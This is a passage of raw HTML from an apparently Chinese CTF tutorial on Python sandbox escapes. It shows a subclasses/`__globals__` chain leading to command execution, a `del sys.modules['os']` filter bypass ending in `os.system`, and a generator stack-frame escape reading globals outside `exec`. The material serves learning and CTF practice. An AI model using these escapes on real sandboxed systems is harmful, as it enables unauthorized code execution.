16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>\"\".__class__.__base__.subclasses__()&#91;\u4e0b\u6807&#93;<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #B5695999\">&quot;&quot;<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #998418\">__class__<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #393A34\">__base__<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #393A34\">subclasses__<\/span><span style=\"color: #999999\">()&#91;<\/span><span style=\"color: #393A34\">\u4e0b\u6807<\/span><span style=\"color: #999999\">&#93;<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">__init__ \u65b9\u6cd5\u662f\u8bbf\u95ee\u8be5\u7c7b\u7684\u6784\u9020\u51fd\u6570\uff0c\u800c\u51fd\u6570\u5bf9\u8c61\u5c31\u6709 __globals__ \u65b9\u6cd5\uff0c\u5c31\u80fd\u83b7\u53d6\u5230\u8be5\u6a21\u5757\u7684\u5168\u5c40\u547d\u540d\u7a7a\u95f4\u3002\u7531\u6b64\u6210\u529f\u5b9e\u73b0 Rce\u3002<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(1 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>\"\".__class__.__base__.subclasses__()&#91;\u4e0b\u6807&#93;.__init__.__globals__&#91;'\u51fd\u6570'&#93;...<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #B5695999\">&quot;&quot;<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #998418\">__class__<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #393A34\">__base__<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #393A34\">subclasses__<\/span><span style=\"color: #999999\">()&#91;<\/span><span style=\"color: #393A34\">\u4e0b\u6807<\/span><span style=\"color: #999999\">&#93;.<\/span><span style=\"color: #998418\">__init__<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #998418\">__globals__<\/span><span style=\"color: #999999\">&#91;<\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #B56959\">\u51fd\u6570<\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #999999\">&#93;<\/span><span style=\"color: #A65E2B\">...<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\">sys.modules\u8fc7\u6ee4<\/h4>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(1 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>import sys\nsys.modules&#91;'os'&#93; = 'not allowed'<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #1E754F\">import<\/span><span style=\"color: #393A34\"> sys<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">sys<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #393A34\">modules<\/span><span style=\"color: #999999\">&#91;<\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #B56959\">os<\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #999999\">&#93;<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #B56959\">not allowed<\/span><span style=\"color: #B5695999\">&#39;<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u5982\u679c\u76f4\u63a5\u5bf9 sys.modules \u4e0b\u624b\uff0c\u7be1\u6539\u5176\u4e2d\u7684\u6a21\u5757\u5bf9\u8c61\uff0c\u88ab\u7be1\u6539\u7684\u6a21\u5757\u5c31\u5f7b\u5e95\u6ca1\u6cd5\u7528\u4e86\u3002\u6ce8\u610f\u8fd9\u91cc\u4e0d\u80fd\u76f4\u63a5\u628a\u5f85\u8fc7\u6ee4\u6a21\u5757\u76f4\u63a5\u5220\u4e86\uff0c\u53ea\u662f\u5220\u9664\u7684\u8bdd import \u7684\u65f6\u5019\u89e3\u91ca\u5668\u4f1a\u76f4\u63a5\u4ece\u6587\u4ef6\u52a0\u8f7d\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u91cc\u53ef\u4ee5\u8fd9\u4e48\u7ed5\u8fc7\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(1 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>del sys.modules&#91;'os'&#93;\nimport os\nos.system('ls')<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #1E754F\">del<\/span><span style=\"color: #393A34\"> sys<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #393A34\">modules<\/span><span style=\"color: #999999\">&#91;<\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #B56959\">os<\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #999999\">&#93;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #1E754F\">import<\/span><span style=\"color: #393A34\"> os<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">os<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #393A34\">system<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #B56959\">ls<\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #999999\">)<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u5220\u9664\u8be5\u6a21\u5757\u4e4b\u540e\u5c31\u80fd\u5b9e\u73b0\u91cd\u65b0\u52a0\u8f7d\u3002<\/p>\n\n\n\n<div style=\"height:45px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\">\u6808\u5e27\u9003\u9038<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">\u6808\u5e27<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u5728 Python \u4e2d\uff0c<strong>\u6808\u5e27\uff08stack frame\uff09<\/strong>\u662f\u51fd\u6570\u6216\u65b9\u6cd5\u8c03\u7528\u65f6\u4e3a\u6bcf\u4e2a\u8c03\u7528\u521b\u5efa\u7684\u4e00\u4e2a\u5185\u5b58\u7ed3\u6784\u3002\u5b83\u5305\u542b\u4e86\u51fd\u6570\u6267\u884c\u8fc7\u7a0b\u4e2d\u9700\u8981\u7684\u5404\u79cd\u4fe1\u606f\uff0c\u5305\u62ec\u5c40\u90e8\u53d8\u91cf\u3001\u51fd\u6570\u53c2\u6570\u3001\u8fd4\u56de\u5730\u5740\u7b49\u3002\u5f53\u51fd\u6570\u88ab\u8c03\u7528\u65f6\uff0cPython \u4f1a\u5c06\u6808\u5e27\u538b\u5165\u8c03\u7528\u6808\uff0c\u6267\u884c\u5b8c\u6210\u540e\uff0c\u6808\u5e27\u4f1a\u88ab\u5f39\u51fa\u3002<\/p>\n\n\n\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\">\u6808\u5e27\u5bf9\u8c61\u7684\u5185\u7f6e\u5c5e\u6027<\/h4>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(1 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>f_globals: \u5b57\u5178\uff0c\u5305\u542b\u8be5\u6808\u5e27\u5bf9\u5e94\u51fd\u6570\u6216\u65b9\u6cd5\u6240\u5728\u6a21\u5757\u7684\u5168\u5c40\u547d\u540d\u7a7a\u95f4\u3002\nf_locals: \u5b57\u5178\uff0c\u5305\u542b\u8be5\u6808\u5e27\u5bf9\u5e94\u51fd\u6570\u6216\u65b9\u6cd5\u7684\u5c40\u90e8\u53d8\u91cf\u3002\nf_back: \u6808\u5e27\u5bf9\u8c61\uff0c\u6307\u5411\u4e0a\u4e00\u7ea7\u8c03\u7528\u7684\u6808\u5e27\u3002\nf_code: \u4ee3\u7801\u5bf9\u8c61\uff0c\u5305\u542b\u8be5\u6808\u5e27\u5bf9\u5e94\u51fd\u6570\u6216\u65b9\u6cd5\u7684\u5b57\u8282\u7801\u6307\u4ee4\u3001\u5e38\u91cf\u3001\u53d8\u91cf\u7b49\u4fe1\u606f\u3002<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #393A34\">f_globals<\/span><span style=\"color: #999999\">:<\/span><span style=\"color: #393A34\"> \u5b57\u5178\uff0c\u5305\u542b\u8be5\u6808\u5e27\u5bf9\u5e94\u51fd\u6570\u6216\u65b9\u6cd5\u6240\u5728\u6a21\u5757\u7684\u5168\u5c40\u547d\u540d\u7a7a\u95f4\u3002<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">f_locals<\/span><span style=\"color: #999999\">:<\/span><span style=\"color: #393A34\"> \u5b57\u5178\uff0c\u5305\u542b\u8be5\u6808\u5e27\u5bf9\u5e94\u51fd\u6570\u6216\u65b9\u6cd5\u7684\u5c40\u90e8\u53d8\u91cf\u3002<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">f_back<\/span><span style=\"color: #999999\">:<\/span><span style=\"color: #393A34\"> \u6808\u5e27\u5bf9\u8c61\uff0c\u6307\u5411\u4e0a\u4e00\u7ea7\u8c03\u7528\u7684\u6808\u5e27\u3002<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">f_code<\/span><span style=\"color: #999999\">:<\/span><span style=\"color: #393A34\"> \u4ee3\u7801\u5bf9\u8c61\uff0c\u5305\u542b\u8be5\u6808\u5e27\u5bf9\u5e94\u51fd\u6570\u6216\u65b9\u6cd5\u7684\u5b57\u8282\u7801\u6307\u4ee4\u3001\u5e38\u91cf\u3001\u53d8\u91cf\u7b49\u4fe1\u606f\u3002<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\">\u751f\u6210\u5668\u6355\u6349\u6808\u5e27\u5bf9\u8c61<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u751f\u6210\u5668\u7279\u6b8a\u7684\u51fd\u6570\uff0c\u901a\u8fc7 <strong>yield<\/strong> \u5173\u952e\u5b57\u6765\u5b9a\u4e49\u3002\u8ddf\u666e\u901a\u51fd\u6570\u7684\u533a\u522b\u5728\u4e8e\uff0c\u751f\u6210\u5668\u51fd\u6570\u6bcf\u6b21\u9047\u5230 yield \u65f6\uff0c\u90fd\u4f1a<strong>\u6682\u505c\u5e76\u4fdd\u5b58\u5f53\u524d\u72b6\u6001<\/strong>\uff08\u5c40\u90e8\u53d8\u91cf\u3001\u6267\u884c\u4f4d\u7f6e\u7b49\uff09\uff0c\u5f53\u4e0b\u6b21\u8c03\u7528 <strong>next()<\/strong> \u65f6\uff0c\u4f1a\u4ece\u4e0a\u6b21\u6682\u505c\u7684\u5730\u65b9\u7ee7\u7eed\u6267\u884c\u3002<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(2 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>def f():\n \u00a0 \u00a0a = 1\n \u00a0 \u00a0while 1:\n \u00a0 \u00a0 \u00a0 \u00a0yield a\n \u00a0 \u00a0 \u00a0 \u00a0a += 1\n\u200b\nf=f()\nprint(next(f))\nprint(next(f))\n\u200b\n# 1\n# 2<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #AB5959\">def<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #59873A\">f<\/span><span style=\"color: #999999\">():<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0 \u00a0a <\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #2F798A\">1<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0 \u00a0<\/span><span style=\"color: #1E754F\">while<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #2F798A\">1<\/span><span style=\"color: #999999\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0 \u00a0 \u00a0 \u00a0<\/span><span style=\"color: #1E754F\">yield<\/span><span style=\"color: #393A34\"> a<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0 \u00a0 \u00a0 \u00a0a <\/span><span style=\"color: #999999\">+=<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #2F798A\">1<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">\u200b<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">f<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #393A34\">f<\/span><span style=\"color: #999999\">()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #998418\">print<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #998418\">next<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #393A34\">f<\/span><span style=\"color: #999999\">))<\/span><\/span>\n<span class=\"line\"><span style=\"color: #998418\">print<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #998418\">next<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #393A34\">f<\/span><span style=\"color: #999999\">))<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">\u200b<\/span><\/span>\n<span class=\"line\"><span style=\"color: #A0ADA0\"># 1<\/span><\/span>\n<span class=\"line\"><span style=\"color: #A0ADA0\"># 2<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u751f\u6210\u5668\u6709\u4e00\u4e2a\u5185\u7f6e\u5c5e\u6027 <strong>gi_frame<\/strong>\uff0c\u6307\u5411\u8fd9\u6b21\u8c03\u7528\u6240\u521b\u5efa\u7684\u6808\u5e27\u5bf9\u8c61\u3002<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(2 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>def f():\n \u00a0 \u00a0a = 1\n \u00a0 \u00a0while 1:\n \u00a0 \u00a0 \u00a0 \u00a0yield a\n \u00a0 \u00a0 \u00a0 \u00a0a += 1\n\u200b\nf=f()\nprint(f.gi_frame)\n\u200b\n# &lt;frame at 0x74bacb4668e0, file '\/CTF\/Python\/0Test\/test.py', line 1, code f><\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #AB5959\">def<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #59873A\">f<\/span><span style=\"color: #999999\">():<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0 \u00a0a <\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #2F798A\">1<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0 \u00a0<\/span><span style=\"color: #1E754F\">while<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #2F798A\">1<\/span><span style=\"color: #999999\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0 \u00a0 \u00a0 \u00a0<\/span><span style=\"color: #1E754F\">yield<\/span><span style=\"color: #393A34\"> a<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0 \u00a0 \u00a0 \u00a0a <\/span><span style=\"color: #999999\">+=<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #2F798A\">1<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">\u200b<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">f<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #393A34\">f<\/span><span style=\"color: #999999\">()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #998418\">print<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #393A34\">f<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #393A34\">gi_frame<\/span><span style=\"color: #999999\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">\u200b<\/span><\/span>\n<span class=\"line\"><span style=\"color: #A0ADA0\"># &lt;frame at 0x74bacb4668e0, file &#39;\/CTF\/Python\/0Test\/test.py&#39;, line 1, code f&gt;<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">\u6808\u5e27\u9003\u9038\u7684\u5b9e\u73b0<\/h3>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(2 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>test.py\n\u200b\nflag=\"flagflag\"\npayload='''\ndef f():\n \u00a0  yield f.gi_frame.f_back.f_back.f_globals&#91;'flag'&#93;\nf = f()\nframe = next(f)\nprint(frame)\n'''\nlocals={}\ncode=compile(payload,\"test1\",\"exec\")\nexec(code,locals)<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" 